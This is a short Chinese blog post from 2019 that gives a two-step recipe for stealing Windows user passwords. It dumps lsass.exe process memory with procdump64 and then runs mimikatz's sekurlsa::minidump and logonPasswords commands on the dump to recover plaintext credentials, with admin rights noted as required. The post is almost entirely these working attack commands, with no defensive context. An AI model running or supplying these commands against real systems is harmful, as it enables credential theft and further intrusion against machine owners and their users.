两步完成利用procdump64+mimikatz获取win用户密码

两步完成利用procdump64+mimikatz获取win用户密码


  • 使用procdump64+mimikatz可实现从内存中获取明文密码

    1.导出lsass.exe

    procdump64.exe -accepteula -ma lsass.exe lsass.dmp
    (注:必须使用管理员权限)

2.执行mimikatz

mimikatz.exe  "sekurlsa::minidump lsass.dmp"  "sekurlsa::logonPasswords full"  exit

(注:必须使用管理员权限)

成功获取明文密码

-------------本文结束❤感谢阅读-------------

本文标题:两步完成利用procdump64+mimikatz获取win用户密码

文章作者:MaiKeFee

发布时间:2019年09月03日

最后更新:2019年09月06日

原始链接:http://MaiKeFee.com/archives/f86fa73d.html